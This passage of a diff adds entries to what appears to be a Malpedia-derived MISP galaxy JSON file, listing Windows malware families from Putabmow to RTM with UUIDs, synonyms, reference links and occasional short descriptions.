+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" + ] + }, + "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", + "value": "Putabmow", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", + "value": "PvzOut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", + "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", + "https://twitter.com/physicaldrive0/status/573109512145649664" + ] + }, + "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", + "value": "pwnpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", + "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", + "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", + "https://www.youtube.com/watch?v=HfSQlC76_s4" + ] + }, + "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", + "value": "Pykspa", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Locky Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" + ] + }, + "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", + "value": "PyLocky", + 
"description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" + ] + }, + "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", + "value": "Qaccel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", + "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", + "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", + "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", + "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", + "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" + ] + }, + "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", + "value": "Qadars", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qbot", + "Pinkslipbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", + "http://contagiodump.blogspot.com/2010/11/template.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" + ] + }, + "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", + "value": 
"QakBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tolouge" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" + ] + }, + "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", + "value": "QHost", + "description": "" + }, + { + "meta": { + "synonyms": [ + "qtproject" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" + ] + }, + "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", + "value": "QtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", + "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" + ] + }, + "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", + "value": "Quant Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://github.com/quasar/QuasarRAT/tree/master/Client", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", + 
"https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "05252643-093b-4070-b62f-d5836683a9fa", + "value": "Quasar RAT", + "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", + "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" + ] + }, + "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", + "value": "r980", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", + "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" + ] + }, + "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", + "value": "Radamant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", + "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" + ] + }, + "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", + "value": "RadRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "brebsd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", + 
"https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" + ] + }, + "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", + "value": "Rambo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" + ] + }, + "uuid": "51f53823-d289-4176-af45-3fca7eda824b", + "value": "Ramdo", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nimnul" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", + "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", + "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "542161c0-47a4-4297-baca-5ed98386d228", + "value": "Ramnit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", + "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", + "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", + "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/" + ] + }, + "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", + "value": "Ranbyus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", + "http://blog.talosintel.com/2016/07/ranscam.html" + ] + }, + "uuid": 
"50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", + "value": "Ranscam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", + "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" + ] + }, + "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", + "value": "Ransoc", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WinLock" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", + "https://forum.malekal.com/viewtopic.php?t=36485&start=" + ] + }, + "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", + "value": "Ransomlock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", + "https://twitter.com/malwrhunterteam/status/977275481765613569", + "https://twitter.com/malwrhunterteam/status/997748495888076800" + ] + }, + "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", + "value": "Rapid Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", + "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" + ] + }, + "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", + "value": "RapidStealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", + "value": "rarstar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://blog.trex.re.kr/3" + ] + }, + "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", + "value": "RatabankaPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", + "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" + ] + }, + "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", + "value": "RawPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Remote Control System", + "Crisis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", + "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" + ] + }, + "uuid": "c359c74e-4155-4e66-a344-b56947f75119", + "value": "RCS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" + ] + }, + "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", + "value": "rdasrv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", + "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", + "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" + ] + }, + "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", + 
"value": "ReactorBot", + "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + ] + }, + "uuid": "826c31ca-2617-47e4-b236-205da3881182", + "value": "Reaver", + "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", + "https://www.recordedfuture.com/redalpha-cyber-campaigns/" + ] + }, + "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", + "value": "RedAlpha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", + "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", + "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" + ] + }, + "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", + "value": "RedLeaves", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", + "https://twitter.com/JaromirHorejsi/status/816237293073797121" + ] + }, + "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", + "value": "Red Alert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", + "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" + ] + }, + "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", + "value": "Red Gambler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", + "https://sensepost.com/discover/tools/reGeorg/", + "https://github.com/sensepost/reGeorg" + ] + }, + "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", + "value": "reGeorg", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", + "value": "Regin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", + "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://secrary.com/ReversingMalware/RemcosRAT/" + ] + }, + "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", + "value": "Remcos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", + "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" + ] + }, + "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", + "value": "Remexi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" + ] + }, + "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", + "value": "Remsec", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" + ] + }, + "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", + "value": "Remy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", + "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" + ] + }, + "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", + "value": "Rerdom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", + "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" + ] + }, + "uuid": "42fa55e3-e708-4c11-b807-f31573639941", + "value": "Retadup", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tsukuba", + "Werdlod" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", + "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", + "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", + "https://github.com/cocaman/retefe" + ] + }, + "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "value": "Retefe", + "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. 
The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic." + }, + { + "meta": { + "synonyms": [ + "Revetrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", + "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/", + "https://isc.sans.edu/diary/rss/22590", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", + "value": "Revenge RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + ] + }, + "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", + "value": "RGDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", + "value": "Rikamanu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" + ] + }, + "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", + "value": "Rincux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" + ] + }, + "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", + "value": "Ripper ATM", + "description": "" + }, 
+ { + "meta": { + "synonyms": [ + "yellowalbatross" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", + "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" + ] + }, + "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", + "value": "rock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", + "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" + ] + }, + "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", + "value": "Rockloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" + ] + }, + "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", + "value": "Rofin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" + ] + }, + "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", + "value": "Rokku", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", + "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", + "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", + "https://www.youtube.com/watch?v=uoBQE5s2ba4" + ] + }, + "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", + "value": "RokRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CarbonGrabber" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", + "http://blogs.cisco.com/security/talos/rombertik" + ] + }, + "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", + "value": "Rombertik", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" + ] + }, + "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", + "value": "Romeo(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" + ] + }, + "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", + "value": "Roopirs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + ] + }, + "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", + "value": "Roseam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", + "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + ] + }, + "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", + "value": "Rover", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Mayachok", + "Cidox", + "BkLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", + "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", + "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", + "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", + "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", + 
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", + "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" + ] + }, + "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", + "value": "Rovnix", + "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", + "value": "RoyalCli", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", + "value": "Royal DNS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", + "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" + ] + }, + "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", + "value": "Rozena", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", + 
